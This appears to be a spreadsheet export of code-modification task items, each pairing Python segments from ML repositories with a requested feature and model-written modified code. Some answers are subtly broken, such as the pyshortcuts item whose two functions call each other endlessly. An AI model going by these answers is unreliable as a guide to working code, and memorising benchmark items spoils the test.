"%s --wxgui" % os.path.join(sys.prefix, bindir, \'pyshortcut\'),\n    name=\'PyShortcut\', terminal=False)\n\nprint("pyshortcuts GUI: %s" % scut.target)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def make_shortcut(script, name=None, terminal=True, folder=None, icon=None, desktop=True, startmenu=True, executable=None, noexe=False):\n    #Modify: Added support for custom shortcut creation logic\n    from pyshortcuts.custom_shortcut import create_custom_shortcut\n    return create_custom_shortcut(script, name, terminal, folder, icon, desktop, startmenu, executable, noexe)', '#file 2': 'scut = make_shortcut(\n    "%s --wxgui" % os.path.join(sys.prefix, bindir, \'pyshortcut\'),\n    name=\'PyShortcut\', terminal=False)', '#file 3': 'def create_custom_shortcut(script, name=None, terminal=True, folder=None, icon=None, desktop=True, startmenu=True, executable=None, noexe=False):\n    #New: Custom logic for creating shortcuts\n    # Example: Custom logic could involve additional checks or modifications\n    print("Creating custom shortcut with custom logic")\n    # Original logic can be preserved or modified as needed\n    return make_shortcut(script, name, terminal, folder, icon, desktop, startmenu, executable, noexe)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'RnnVec class __init__ method and __getitem__ method in rnnvec_model.py', 'invoking_code_segment': 'get_input function in get_conll_embeddings.py that calls model[line.split()[0]] and processes word embeddings', 'feature_description': "Add word length as an additional feature to the word embeddings. The word length will be normalized and appended to each word's embedding vector, providing the model with information about word length which can be useful for NER tasks.", 'modified_complete_code': '# File 1: ner-lstm/embeddings/rnnvec_model.py\nfrom __future__ import print_function\nimport numpy as np\nimport tensorflow as tf\nfrom random_vec import RandomVec\nfrom collections import Counter\nimport pickle as pkl\nimport argparse\n\nclass RnnVec:\n    def __init__(self, args):\n        self.rand_model = RandomVec(args.rnn_size)\n        self.max_word_length = 0  # #New: Track maximum word length\n        corpus = open(args.corpus, \'r\').read().lower().split()\n        # #New: Calculate max word length from corpus\n        self.max_word_length = max(len(word) for word in corpus) if corpus else 1\n        word_count = [[\'unk\', 0]]\n        word_count.extend(Counter(corpus).most_common(args.vocab_size - 1))\n        word_count.sort(key=lambda x: x[1], reverse=True)\n        self.vocab = {}\n        for word, freq in word_count:\n            self.vocab[word] = len(self.vocab)\n        print(\'vocabulary built\')\n        int_corpus = []\n        for word in corpus:\n            int_corpus.append(self.vocab.get(word, 0))\n        input_data = np.zeros(len(int_corpus))\n        output_data = np.zeros((len(int_corpus), 2 * args.window))\n        for i in range(len(int_corpus)):\n            input_data[i] = int_corpus[i]\n            past = int_corpus[i - args.window:i]\n            future = int_corpus[i + 1:i + 1 + args.window]\n            total = past + future\n            total.extend([0] * (2 * args.window - len(total)))\n            output_data[i] = total\n        print(\'data formed\')\n        del corpus\n        del word_count\n        del int_corpus\n        num_sentence = (len(input_data) + args.sentence_length - 1) // args.sentence_length\n        input_data = np.resize(input_data, (num_sentence, args.sentence_length))\n        output_data = np.resize(output_data, (num_sentence, args.sentence_length, 2 * args.window))\n        print(\'training\')\n        cell = tf.nn.rnn_cell.BasicLSTMCell(args.rnn_size, state_is_tuple=True)\n        cell = tf.nn.rnn_cell.MultiRNNCell([cell] * args.num_layers, state_is_tuple=True)\n        input_tensor = tf.placeholder(tf.int32, [args.batch_size, args.sentence_length])\n        output_tensor = tf.placeholder(tf.int32, [args.batch_size, args.sentence_length, 2 * args.window])\n        initial_state = cell.zero_state(args.batch_size, tf.float32)\n        with tf.variable_scope(\'rnnlm\'):\n            weights = tf.get_variable("softmax_w", [args.vocab_size, args.rnn_size])\n            bias = tf.get_variable("softmax_b", [args.vocab_size])\n            with tf.device("/cpu:0"):\n                embedding = tf.get_variable("embedding", [args.vocab_size, args.rnn_size])\n                inputs = tf.nn.embedding_lookup(embedding, input_tensor)\n        outputs, last_state = tf.nn.dynamic_rnn(cell, inputs, initial_state=initial_state)\n        output = tf.reshape(outputs, [-1, args.rnn_size])\n        loss = tf.nn.sampled_softmax_loss(weights, bias, output, tf.reshape(output_tensor, [-1, 2 * args.window]), 128,\n                                          args.vocab_size, num_true=2 * args.window)\n        cost = tf.reduce_mean(loss)\n        lr = tf.Variable(0.0, trainable=False)\n        tvars = tf.trainable_variables()\n        grads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars), 5)\n        optimizer = tf.train.AdamOptimizer(lr)\n        train_op = optimizer.apply_gradients(zip(grads, tvars))\n        sess = tf.Session()\n        sess.run(tf.initialize_all_variables())\n        for e in range(3):\n            state = sess.run(initial_state)\n            for i in range(0, input_data.shape[0], args.batch_size):\n                if i + args.batch_size &gt; input_data.shape[0]:\n                    i = input_data.shape[0] - args.batch_size\n                _, error, state = sess.run([train_op, cost, last_state],\n                                           feed_dict={input_tensor: input_data[i:i + args.batch_size],\n                                                      output_tensor: output_data[i:i + args.batch_size],\n                                                      initial_state: state,\n                                                      lr: .01 * (.3 ** e)})\n                print(\'batch percentage = %f, cost = %f, epoch %d\' % (i * 100 / input_data.shape[0], error, e))\n        self.embeddings = sess.run(embedding)\n\n    def __getitem__(self, word):\n        word = word.lower()\n        try:\n            embedding = self.embeddings[self.vocab[word]]\n        except KeyError:\n            embedding = self.rand_model[word]\n        # #New: Append normalized word length feature\n        word_length_feature = np.array([len(word) / float(self.max_word_length)])\n        return np.append(embedding, word_length_feature)\n\nif __name__ == \'__main__\':\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\'--corpus\', type=str, help=\'corpus location\', required=True)\n    parser.add_argument(\'--window\', type=int, default=5, help=\'window size\')\n    parser.add_argument(\'--vocab_size\', type=int, default=50000, help=\'number of threads\')\n    parser.add_argument(\'--batch_size\', type=int, default=256, help=\'batch size of training\')\n    parser.add_argument(\'--sentence_length\', type=int, help=\'sentence length\', required=True)\n    parser.add_argument(\'--rnn_size\', type=int, default=128, help=\'hidden layer size of rnn\')\n    parser.add_argument(\'--num_layers\', type=int, default=2, help=\'number of layers in the rnn\')\n    args = parser.parse_args()\n    model = RnnVec(args)\n    pkl.dump(model, open(\'rnnvec_model_\' + str(args.rnn_size) + \'.pkl\', \'wb\'))\n\n# File 2: ner-lstm/embeddings/get_conll_embeddings.py\nfrom __future__ import print_function\nimport numpy as np\nimport pickle as pkl\nimport sys\nimport argparse\nfrom wordvec_model import WordVec\nfrom glove_model import GloveVec\nfrom rnnvec_model import RnnVec\n\ndef find_max_length(file_name):\n    temp_len = 0\n    max_length = 0\n    for line in open(file_name):\n        if line in [\'\\n\', \'\\r\\n\']:\n            if temp_len &gt; max_length:\n                max_length = temp_len\n            temp_len = 0\n        else:\n            temp_len += 1\n    return max_length\n\ndef pos(tag):\n    one_hot = np.zeros(5)\n    if tag == \'NN\' or tag == \'NNS\':\n        one_hot[0] = 1\n    elif tag == \'FW\':\n        one_hot[1] = 1\n    elif tag == \'NNP\' or tag == \'NNPS\':\n        one_hot[2] = 1\n    elif \'VB\' in tag:\n        one_hot[3] = 1\n    else:\n        one_hot[4] = 1\n    return one_hot\n\ndef chunk(tag):\n    one_hot = np.zeros(5)\n    if \'NP\' in tag:\n        one_hot[0] = 1\n    elif \'VP\' in tag:\n        one_hot[1] = 1\n    elif \'PP\' in tag:\n        one_hot[2] = 1\n    elif tag == \'O\':\n        one_hot[3] = 1\n    else:\n        one_hot[4] = 1\n    return one_hot\n\ndef capital(word):\n    if ord(\'A\') &lt;= ord(word[0]) &lt;= ord(\'Z\'):\n        return np.array([1])\n    else:\n        return np.array([0])\n\ndef get_input(model, word_dim, input_file, output_embed, output_tag, sentence_length=-1):\n    print(\'processing %s\' % input_file)\n    word = []\n    tag = []\n    sentence = []\n    sentence_tag = []\n    if sentence_length == -1:\n        max_sentence_length = find_max_length(input_file)\n    else:\n        max_sentence_length = sentence_length\n    sentence_length = 0\n    print("max sentence length is %d" % max_sentence_length)\n    for line in open(input_file):\n        if line in [\'\\n\', \'\\r\\n\']:\n            for _ in range(max_sentence_length - sentence_length):\n                tag.append(np.array([0] * 5))\n                # #Modify: Updated to account for word_length feature (word_dim + 11 + 1)\n                temp = np.array([0 for _ in range(word_dim + 12)])\n                word.append(temp)\n            sentence.append(word)\n            sentence_tag.append(np.array(tag))\n            sentence_length = 0\n            word = []\n            tag = []\n        else:\n            assert (len(line.split()) == 4)\n            sentence_length += 1\n            temp = model[line.split()[0]]\n            # #Modify: Updated assertion to account for word_length feature\n            assert len(temp) == word_dim + 1\n            temp = np.append(temp, pos(line.split()[1]))  # adding pos embeddings\n            temp = np.append(temp, chunk(line.split()[2]))  # adding chunk embeddings\n            temp = np.append(temp, capital(line.split()[0]))  # adding capital embedding\n            word.append(temp)\n            t = line.split()[3]\n            # Five classes 0-None,1-Person,2-Location,3-Organisation,4-Misc\n            if t.endswith(\'PER\'):\n                tag.append(np.array([1, 0, 0, 0, 0]))\n            elif t.endswith(\'LOC\'):\n                tag.append(np.array([0, 1, 0, 0, 0]))\n            elif t.endswith(\'ORG\'):\n                tag.append(np.array([0, 0, 1, 0, 0]))\n            elif t.endswith(\'MISC\'):\n                tag.append(np.array([0, 0, 0, 1, 0]))\n            elif t.endswith(\'O\'):\n                tag.append(np.array([0, 0, 0, 0, 1]))\n            else:\n                print("error in input tag {%s}" % t)\n                sys.exit(0)\n    assert (len(sentence) == len(sentence_tag))\n    pkl.dump(sentence, open(output_embed, \'wb\'))\n    pkl.dump(sentence_tag, open(output_tag, \'wb\'))\n\nif __name__ == \'__main__\':\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\'--train\', type=str, help=\'train file location\', required=True)\n    parser.add_argument(\'--test_a\', type=str, help=\'test_a file location\', required=True)\n    parser.add_argument(\'--test_b\', type=str, help=\'test_b location\', required=True)\n    parser.add_argument(\'--sentence_length\', type=int, default=-1, help=\'max sentence length\')\n    parser.add_argument(\'--use_model\', type=str, help=\'model location\', required=True)\n    parser.add_argument(\'--model_dim\', type=int, help=\'model dimension of words\', required=True)\n    args = parser.parse_args()\n    trained_model = pkl.load(open(args.use_model, \'rb\'))\n    get_input(trained_model, args.model_dim, args.train, \'train_embed.pkl\', \'train_tag.pkl\',\n              sentence_length=args.sentence_length)\n    get_input(trained_model, args.model_dim, args.test_a, \'test_a_embed.pkl\', \'test_a_tag.pkl\',\n              sentence_length=args.sentence_length)\n    get_input(trained_model, args.model_dim, args.test_b, \'test_b_embed.pkl\', \'test_b_tag.pkl\',\n              sentence_length=args.sentence_length)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def get_input(model, word_dim, input_file, output_embed, output_tag, sentence_length=-1):\n    print(\'processing %s\' % input_file)\n    word = []\n    tag = []\n    sentence = []\n    sentence_tag = []\n    if sentence_length == -1:\n        max_sentence_length = find_max_length(input_file)\n    else:\n        max_sentence_length = sentence_length\n    sentence_length = 0\n    print("max sentence length is %d" % max_sentence_length)\n    for line in open(input_file):\n        if line in [\'\\n\', \'\\r\\n\']:\n            for _ in range(max_sentence_length - sentence_length):\n                tag.append(np.array([0] * 5))\n                temp = np.array([0 for _ in range(word_dim + 12)])\n                word.append(temp)\n            sentence.append(word)\n            sentence_tag.append(np.array(tag))\n            sentence_length = 0\n            word = []\n            tag = []\n        else:\n            assert (len(line.split()) == 4)\n            sentence_length += 1\n            temp = model[line.split()[0]]\n            assert len(temp) == word_dim\n            temp = np.append(temp, pos(line.split()[1]))  # adding pos embeddings\n            temp = np.append(temp, chunk(line.split()[2]))  # adding chunk embeddings\n            temp = np.append(temp, capital(line.split()[0]))  # adding capital embedding\n            # Modify for modified parts\n            temp = np.append(temp, add_additional_features(line.split()[0]))  # adding word length feature\n            word.append(temp)\n            t = line.split()[3]\n            # Five classes 0-None,1-Person,2-Location,3-Organisation,4-Misc\n            if t.endswith(\'PER\'):\n                tag.append(np.array([1, 0, 0, 0, 0]))\n            elif t.endswith(\'LOC\'):\n                tag.append(np.array([0, 1, 0, 0, 0]))\n            elif t.endswith(\'ORG\'):\n                tag.append(np.array([0, 0, 1, 0, 0]))\n            elif t.endswith(\'MISC\'):\n                tag.append(np.array([0, 0, 0, 1, 0]))\n            elif t.endswith(\'O\'):\n                tag.append(np.array([0, 0, 0, 0, 1]))\n            else:\n                print("error in input tag {%s}" % t)\n                sys.exit(0)\n    assert (len(sentence) == len(sentence_tag))\n    pkl.dump(sentence, open(output_embed, \'wb\'))\n    pkl.dump(sentence_tag, open(output_tag, \'wb\'))', '#file 2': "if __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--train', type=str, help='train file location', required=True)\n    parser.add_argument('--test_a', type=str, help='test_a file location', required=True)\n    parser.add_argument('--test_b', type=str, help='test_b location', required=True)\n    parser.add_argument('--sentence_length', type=int, default=-1, help='max sentence length')\n    parser.add_argument('--use_model', type=str, help='model location', required=True)\n    parser.add_argument('--model_dim', type=int, help='model dimension of words', required=True)\n    args = parser.parse_args()\n    trained_model = pkl.load(open(args.use_model, 'rb'))\n    get_input(trained_model, args.model_dim, args.train, 'train_embed.pkl', 'train_tag.pkl',\n              sentence_length=args.sentence_length)\n    get_input(trained_model, args.model_dim, args.test_a, 'test_a_embed.pkl', 'test_a_tag.pkl',\n              sentence_length=args.sentence_length)\n    get_input(trained_model, args.model_dim, args.test_b, 'test_b_embed.pkl', 'test_b_tag.pkl',\n              sentence_length=args.sentence_length)", '#file 3': 'def add_additional_features(word):\n    # New feature: Add word length as an additional feature\n    word_length = len(word)\n    return np.array([word_length])\n\n# Modify for modified parts\n# New for newly added parts'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class FileLogger(object):\n    """\n    A file logger that opens the file periodically and write to it.\n    """\n    def __init__(self, filename, header=None):\n        self.filename = filename\n        if os.path.exists(filename):\n            os.remove(filename)\n        if header is not None:\n            with open(filename, \'w\') as out:\n                print(header, file=out)\n    \n    def log(self, message):\n        with open(self.filename, \'a\') as out:\n            print(message, file=out)', 'invoking_code_segment': 'file_logger = helper.FileLogger(model_save_dir + \'/\' + opt[\'log\'], header="# epoch\\ttrain_loss\\tdev_loss\\tdev_f1")\n...\nfile_logger.log("{}\t{:.6f}\t{:.6f}\t{:.4f}".format(epoch, train_loss, dev_loss, dev_f1))', 'feature_description': 'Enhanced logging of training metrics to a file with support for detailed metric tracking, timestamp recording, and structured log formatting. The FileLogger class now supports logging of training loss, validation loss, F1 scores, learning rates, and other metrics with optional timestamp prefixes and metric categorization.', 'modified_complete_code': '# tacred-relation/utils/helper.py\n"""\nHelper functions.\n"""\n\nimport os\nimport json\nimport argparse\nfrom datetime import datetime  # #New\n\n### IO\ndef check_dir(d):\n    if not os.path.exists(d):\n        print("Directory {} does not exist. Exit.".format(d))\n        exit(1)\n\ndef check_files(files):\n    for f in files:\n        if f is not None and not os.path.exists(f):\n            print("File {} does not exist. Exit.".format(f))\n            exit(1)\n\ndef ensure_dir(d, verbose=True):\n    if not os.path.exists(d):\n        if verbose:\n            print("Directory {} do not exist; creating...".format(d))\n        os.makedirs(d)\n\ndef save_config(config, path, verbose=True):\n    with open(path, \'w\') as outfile:\n        json.dump(config, outfile, indent=2)\n    if verbose:\n        print("Config saved to file {}".format(path))\n    return config\n\ndef load_config(path, verbose=True):\n    with open(path) as f:\n        config = json.load(f)\n    if verbose:\n        print("Config loaded from file {}".format(path))\n    return config\n\ndef print_config(config):\n    info = "Running with the following configs:\\n"\n    for k,v in config.items():\n        info += "\\t{} : {}\\n".format(k, str(v))\n    print("\\n" + info + "\\n")\n    return\n\nclass FileLogger(object):\n    """\n    A file logger that opens the file periodically and write to it.\n    #Modify: Enhanced to support timestamp and metric categorization\n    """\n    def __init__(self, filename, header=None, include_timestamp=False):\n        self.filename = filename\n        self.include_timestamp = include_timestamp  # #New\n        if os.path.exists(filename):\n            os.remove(filename)\n        if header is not None:\n            with open(filename, \'w\') as out:\n                print(header, file=out)\n    \n    def log(self, message, timestamp=False):  # #Modify: Added timestamp parameter\n        with open(self.filename, \'a\') as out:\n            # #New: Add timestamp prefix if requested\n            if timestamp or self.include_timestamp:\n                message = "[{}] {}".format(datetime.now().strftime("%Y-%m-%d %H:%M:%S"), message)\n            print(message, file=out)\n    \n    # #New: Method to log metrics with structured format\n    def log_metrics(self, epoch, train_loss, dev_loss, dev_f1, lr=None, additional_metrics=None):\n        metric_str = "{}\\t{:.6f}\\t{:.6f}\\t{:.4f}".format(epoch, train_loss, dev_loss, dev_f1)\n        if lr is not None:\n            metric_str += "\\t{:.6f}".format(lr)\n        if additional_metrics is not None:\n            for key, value in additional_metrics.items():\n                metric_str += "\\t{}:{}".format(key, value)\n        self.log(metric_str)\n\n# tacred-relation/train.py\n"""\nTrain a model on TACRED.\n"""\n\nimport os\nfrom datetime import datetime\nimport time\nimport numpy as np\nimport random\nimport argparse\nfrom shutil import copyfile\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom data.loader import DataLoader\nfrom model.rnn import RelationModel\nfrom utils import scorer, constant, helper\nfrom utils.vocab import Vocab\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\'--data_dir\', type=str, default=\'dataset/tacred\')\nparser.add_argument(\'--vocab_dir\', type=str, default=\'dataset/vocab\')\nparser.add_argument(\'--emb_dim\', type=int, default=300, help=\'Word embedding dimension.\')\nparser.add_argument(\'--ner_dim\', type=int, default=30, help=\'NER embedding dimension.\')\nparser.add_argument(\'--pos_dim\', type=int, default=30, help=\'POS embedding dimension.\')\nparser.add_argument(\'--hidden_dim\', type=int, default=200, help=\'RNN hidden state size.\')\nparser.add_argument(\'--num_layers\', type=int, default=2, help=\'Num of RNN layers.\')\nparser.add_argument(\'--dropout\', type=float, default=0.5, help=\'Input and RNN dropout rate.\')\nparser.add_argument(\'--word_dropout\', type=float, default=0.04, help=\'The rate at which randomly set a word to UNK.\')\nparser.add_argument(\'--topn\', type=int, default=1e10, help=\'Only finetune top N embeddings.\')\nparser.add_argument(\'--lower\', dest=\'lower\', action=\'store_true\', help=\'Lowercase all words.\')\nparser.add_argument(\'--no-lower\', dest=\'lower\', action=\'store_false\')\nparser.set_defaults(lower=False)\n\nparser.add_argument(\'--attn\', dest=\'attn\', action=\'store_true\', help=\'Use attention layer.\')\nparser.add_argument(\'--no-attn\', dest=\'attn\', action=\'store_false\')\nparser.set_defaults(attn=True)\nparser.add_argument(\'--attn_dim\', type=int, default=200, help=\'Attention size.\')\nparser.add_argument(\'--pe_dim\', type=int, default=30, help=\'Position encoding dimension.\')\n\nparser.add_argument(\'--lr\', type=float, default=1.0, help=\'Applies to SGD and Adagrad.\')\nparser.add_argument(\'--lr_decay\', type=float, default=0.9)\nparser.add_argument(\'--optim\', type=str, default=\'sgd\', help=\'sgd, adagrad, adam or adamax.\')\nparser.add_argument(\'--num_epoch\', type=int, default=30)\nparser.add_argument(\'--batch_size\', type=int, default=50)\nparser.add_argument(\'--max_grad_norm\', type=float, default=5.0, help=\'Gradient clipping.\')\nparser.add_argument(\'--log_step\', type=int, default=20, help=\'Print log every k steps.\')\nparser.add_argument(\'--log\', type=str, default=\'logs.txt\', help=\'Write training log to file.\')\nparser.add_argument(\'--save_epoch\', type=int, default=5, help=\'Save model checkpoints every k epochs.\')\nparser.add_argument(\'--save_dir\', type=str, default=\'./saved_models\', help=\'Root dir for saving models.\')\nparser.add_argument(\'--id\', type=str, default=\'00\', help=\'Model ID under which to save models.\')\nparser.add_argument(\'--info\', type=str, default=\'\', help=\'Optional info for the experiment.\')\n\nparser.add_argument(\'--seed\', type=int, default=1234)\nparser.add_argument(\'--cuda\', type=bool, default=torch.cuda.is_available())\nparser.add_argument(\'--cpu\', action=\'store_true\', help=\'Ignore CUDA.\')\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\nrandom.seed(1234)\nif args.cpu:\n    args.cuda = False\nelif args.cuda:\n    torch.cuda.manual_seed(args.seed)\n\nopt = vars(args)\nopt[\'num_class\'] = len(constant.LABEL_TO_ID)\n\nvocab_file = opt[\'vocab_dir\'] + \'/vocab.pkl\'\nvocab = Vocab(vocab_file, load=True)\nopt[\'vocab_size\'] = vocab.size\nemb_file = opt[\'vocab_dir\'] + \'/embedding.npy\'\nemb_matrix = np.load(emb_file)\nassert emb_matrix.shape[0] == vocab.size\nassert emb_matrix.shape[1] == opt[\'emb_dim\']\n\nprint("Loading data from {} with batch size {}...".format(opt[\'data_dir\'], opt[\'batch_size\']))\ntrain_batch = DataLoader(opt[\'data_dir\'] + \'/train.json\', opt[\'batch_size\'], opt, vocab, evaluation=False)\ndev_batch = DataLoader(opt[\'data_dir\'] + \'/dev.json\', opt[\'batch_size\'], opt, vocab, evaluation=True)\n\nmodel_id = opt[\'id\'] if len(opt[\'id\']) &gt; 1 else \'0\' + opt[\'id\']\nmodel_save_dir = opt[\'save_dir\'] + \'/\' + model_id\nopt[\'model_save_dir\'] = model_save_dir\nhelper.ensure_dir(model_save_dir, verbose=True)\n\nhelper.save_config(opt, model_save_dir + \'/config.json\', verbose=True)\nvocab.save(model_save_dir + \'/vocab.pkl\')\n# #Modify: Initialize FileLogger with include_timestamp parameter\nfile_logger = helper.FileLogger(model_save_dir + \'/\' + opt[\'log\'], header="# epoch\\ttrain_loss\\tdev_loss\\tdev_f1\\tlr", include_timestamp=False)\n\nhelper.print_config(opt)\n\nmodel = RelationModel(opt, emb_matrix=emb_matrix)\n\nid2label = dict([(v,k) for k,v in constant.LABEL_TO_ID.items()])\ndev_f1_history = []\ncurrent_lr = opt[\'lr\']\n\nglobal_step = 0\nglobal_start_time = time.time()\nformat_str = \'{}: step {}/{} (epoch {}/{}), loss = {:.6f} ({:.3f} sec/batch), lr: {:.6f}\'\nmax_steps = len(train_batch) * opt[\'num_epoch\']\n\nfor epoch in range(1, opt[\'num_epoch\']+1):\n    train_loss = 0\n    for i, batch in enumerate(train_batch):\n        start_time = time.time()\n        global_step += 1\n        loss = model.update(batch)\n        train_loss += loss\n        if global_step % opt[\'log_step\'] == 0:\n            duration = time.time() - start_time\n            print(format_str.format(datetime.now(), global_step, max_steps, epoch,\\\n                    opt[\'num_epoch\'], loss, duration, current_lr))\n\n    print("Evaluating on dev set...")\n    predictions = []\n    dev_loss = 0\n    for i, batch in enumerate(dev_batch):\n        preds, _, loss = model.predict(batch)\n        predictions += preds\n        dev_loss += loss\n    predictions = [id2label[p] for p in predictions]\n    dev_p, dev_r, dev_f1 = scorer.score(dev_batch.gold(), predictions)\n    \n    train_loss = train_loss / train_batch.num_examples * opt[\'batch_size\']\n    dev_loss = dev_loss / dev_batch.num_examples * opt[\'batch_size\']\n    print("epoch {}: train_loss = {:.6f}, dev_loss = {:.6f}, dev_f1 = {:.4f}".format(epoch,\\\n            train_loss, dev_loss, dev_f1))\n    \n    # #Modify: Use the new log_metrics method for structured logging\n    file_logger.log_metrics(epoch, train_loss, dev_loss, dev_f1, lr=current_lr, additional_metrics={\'dev_p\': dev_p, \'dev_r\': dev_r})\n\n    model_file = model_save_dir + \'/checkpoint_epoch_{}.pt\'.format(epoch)\n    model.save(model_file, epoch)\n    if epoch == 1 or dev_f1 &gt; max(dev_f1_history):\n        copyfile(model_file, model_save_dir + \'/best_model.pt\')\n        print("new best model saved.")\n    if epoch % opt[\'save_epoch\'] != 0:\n        os.remove(model_file)\n    \n    if len(dev_f1_history) &gt; 10 and dev_f1 &lt;= dev_f1_history[-1] and \\\n            opt[\'optim\'] in [\'sgd\', \'adagrad\']:\n        current_lr *= opt[\'lr_decay\']\n        model.update_lr(current_lr)\n\n    dev_f1_history += [dev_f1]\n    print("")\n\nprint("Training ended with {} epochs.".format(epoch))'}</t>
  </si>
  <si>
    <t>{'#file 1': "def update(self, batch):\n    inputs, labels = batch\n    self.optimizer.zero_grad()\n    logits, _ = self.model(inputs)\n    loss = self.loss(logits, labels)\n    loss.backward()\n    torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.opt['max_grad_norm'])\n    self.optimizer.step()\n    return loss.item()", '#file 2': "for epoch in range(1, opt['num_epoch']+1):\n    train_loss = 0\n    for i, batch in enumerate(train_batch):\n        start_time = time.time()\n        global_step += 1\n        loss = model.update(batch)\n        train_loss += loss\n        if global_step % opt['log_step'] == 0:\n            duration = time.time() - start_time\n            print(format_str.format(datetime.now(), global_step, max_steps, epoch,\n                    opt['num_epoch'], loss, duration, current_lr))\n            #Modify\n            log_training_metrics(epoch, global_step, loss, duration, current_lr)", '#file 3': "def log_training_metrics(epoch, global_step, loss, duration, current_lr):\n    with open('training_metrics.log', 'a') as log_file:\n        log_file.write(f'Epoch: {epoch}, Step: {global_step}, Loss: {loss}, Duration: {duration}, LR: {current_lr}\\n')", '#New': 'No new code snippets required.'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class CrossEntropy2d(nn.Module):\n    def __init__(self, size_average=True, ignore_label=255):\n        super(CrossEntropy2d, self).__init__()\n        self.size_average = size_average\n        self.ignore_label = ignore_label\n\n    def forward(self, predict, target, weight=None):\n        assert not target.requires_grad\n        assert predict.dim() == 4\n        assert target.dim() == 3\n        assert predict.size(0) == target.size(0)\n        assert predict.size(2) == target.size(1)\n        assert predict.size(3) == target.size(2)\n        n, c, h, w = predict.size()\n        target_mask = (target &gt;= 0) * (target != self.ignore_label)\n        target = target[target_mask]\n        if not target.data.dim():\n            return Variable(torch.zeros(1))\n        predict = predict.transpose(1, 2).transpose(2, 3).contiguous()\n        predict = predict[target_mask.view(n, h, w, 1).repeat(1, 1, 1, c)].view(-1, c)\n        loss = F.cross_entropy(predict, target, weight=weight, size_average=self.size_average)\n        return loss', 'invoking_code_segment': 'from utils.loss import CrossEntropy2d\n...\nTrainer = AD_Trainer(args)\n...\nloss_seg1, loss_seg2, loss_adv_target1, loss_adv_target2, loss_me, loss_kl, pred1, pred2, pred_target1, pred_target2, val_loss = Trainer.gen_update(images, images_t, labels, labels_t, i_iter)', 'feature_description': 'Add a weighted cross-entropy loss function to handle class imbalance by computing class weights based on class frequency in the dataset and passing them to the CrossEntropy2d loss function. This allows the model to give higher penalty to misclassification of underrepresented classes.', 'modified_complete_code': '#File 1: Seg-Uncertainty/utils/loss.py\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\n\nclass CrossEntropy2d(nn.Module):\n\n    def __init__(self, size_average=True, ignore_label=255, weight=None):\n        super(CrossEntropy2d, self).__init__()\n        self.size_average = size_average\n        self.ignore_label = ignore_label\n        #Modify: Add weight parameter to constructor\n        self.weight = weight\n\n    def forward(self, predict, target, weight=None):\n        """\n            Args:\n                predict:(n, c, h, w)\n                target:(n, h, w)\n                weight (Tensor, optional): a manual rescaling weight given to each class.\n                                           If given, has to be a Tensor of size "nclasses"\n        """\n        assert not target.requires_grad\n        assert predict.dim() == 4\n        assert target.dim() == 3\n        assert predict.size(0) == target.size(0), "{0} vs {1} ".format(predict.size(0), target.size(0))\n        assert predict.size(2) == target.size(1), "{0} vs {1} ".format(predict.size(2), target.size(1))\n        assert predict.size(3) == target.size(2), "{0} vs {1} ".format(predict.size(3), target.size(3))\n        n, c, h, w = predict.size()\n        target_mask = (target &gt;= 0) * (target != self.ignore_label)\n        target = target[target_mask]\n        if not target.data.dim():\n            return Variable(torch.zeros(1))\n        predict = predict.transpose(1, 2).transpose(2, 3).contiguous()\n        predict = predict[target_mask.view(n, h, w, 1).repeat(1, 1, 1, c)].view(-1, c)\n        #Modify: Use provided weight or fall back to instance weight\n        final_weight = weight if weight is not None else self.weight\n        loss = F.cross_entropy(predict, target, weight=final_weight, size_average=self.size_average)\n        return loss\n\n#New: Add function to compute class weights based on class frequency\ndef compute_class_weights(target, num_classes, ignore_label=255):\n    """\n    Compute class weights inversely proportional to class frequency.\n    Args:\n        target: tensor of shape (N, H, W) containing class labels\n        num_classes: number of classes\n        ignore_label: label to ignore in weight computation\n    Returns:\n        weights: tensor of shape (num_classes,) with computed weights\n    """\n    target_flat = target.view(-1)\n    mask = (target_flat &gt;= 0) * (target_flat != ignore_label)\n    target_flat = target_flat[mask]\n    \n    class_counts = torch.bincount(target_flat, minlength=num_classes)\n    class_counts = class_counts.float()\n    \n    # Avoid division by zero\n    class_counts[class_counts == 0] = 1\n    \n    # Compute weights inversely proportional to frequency\n    weights = 1.0 / class_counts\n    weights = weights / weights.sum() * num_classes\n    \n    return weights\n\n\n#File 2: Seg-Uncertainty/train_ms_robot.py (relevant modifications)\n#Modify: Import the new compute_class_weights function\nfrom utils.loss import CrossEntropy2d, compute_class_weights\n\n#In main() function, after creating dataloaders:\n#New: Compute class weights from training data\ndef compute_dataset_weights(dataloader, num_classes, ignore_label=255):\n    """\n    Compute class weights from entire dataset.\n    """\n    class_counts = torch.zeros(num_classes)\n    for batch in dataloader:\n        images, labels, _, _ = batch\n        labels = labels.long()\n        target_flat = labels.view(-1)\n        mask = (target_flat &gt;= 0) * (target_flat != ignore_label)\n        target_flat = target_flat[mask]\n        class_counts += torch.bincount(target_flat, minlength=num_classes).float()\n    \n    class_counts[class_counts == 0] = 1\n    weights = 1.0 / class_counts\n    weights = weights / weights.sum() * num_classes\n    return weights.cuda()\n\n#In main() function, after creating trainloader:\n#New: Compute and pass class weights to loss function\nclass_weights = compute_dataset_weights(trainloader, args.num_classes, args.ignore_label)\n\n#Modify: Pass class weights when creating loss function in Trainer\n#This would be in the AD_Trainer initialization or gen_update method\n#The CrossEntropy2d loss should be instantiated with:\n#criterion = CrossEntropy2d(size_average=True, ignore_label=args.ignore_label, weight=class_weights)'}</t>
  </si>
  <si>
    <t>```python
# file1.py
#Modify: Replace CrossEntropy2d with WeightedCrossEntropy2d
from file3 import WeightedCrossEntropy2d  #New
class AD_Trainer(object):
    def __init__(self, args):
        self.criterion = WeightedCrossEntropy2d()  #Modify
        # ... other initializations ...
    def gen_update(self, images, images_t, labels, labels_t, i_iter):
        # ... existing code ...
        loss_seg1 = self.criterion(pred1, labels)
        loss_seg2 = self.criterion(pred2, labels)
